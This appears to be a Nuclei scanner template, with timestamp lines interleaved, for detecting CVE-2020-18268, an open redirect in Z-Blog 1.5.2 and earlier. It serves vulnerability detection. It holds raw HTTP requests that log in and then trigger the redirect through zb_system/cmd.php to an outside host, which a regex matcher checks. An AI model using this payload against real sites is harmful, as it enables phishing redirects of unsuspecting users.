2022-01-26 22:01:17 +00:00
id : CVE-2020-18268
info :
2022-10-19 21:11:27 +00:00
name : Z-Blog <=1.5.2 - Open Redirect
2022-01-26 22:01:17 +00:00
author : 0x_Akoko
severity : medium
2022-10-19 21:11:27 +00:00
description : Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-01-26 22:01:17 +00:00
reference :
- https://github.com/zblogcn/zblogphp/issues/216
- https://www.cvedetails.com/cve/CVE-2020-18268
2022-05-17 09:18:12 +00:00
- https://github.com/zblogcn/zblogphp/issues/209
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-18268
2022-01-26 22:01:17 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-01-26 22:01:17 +00:00
cve-id : CVE-2020-18268
cwe-id : CWE-601
2022-01-31 19:12:58 +00:00
tags : cve,cve2020,redirect,zblogphp,authenticated
2022-01-26 22:01:17 +00:00
requests :
2022-01-31 19:11:58 +00:00
- raw :
- |
POST /zb_system/cmd.php?act=verify HTTP/1.1
Host : {{Hostname}}
Content-Length : 81
Content-Type : application/x-www-form-urlencoded
Connection : close
2022-01-26 22:01:17 +00:00
2022-01-31 19:11:58 +00:00
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
2022-06-06 10:40:15 +00:00
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
2022-01-31 19:11:58 +00:00
Host : {{Hostname}}
cookie-reuse : true
2022-01-26 22:01:17 +00:00
matchers :
- type : regex
part : header
2022-01-27 08:48:01 +00:00
regex :
2022-06-06 10:40:15 +00:00
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
2022-10-19 21:11:27 +00:00
# Enhanced by md on 2022/10/13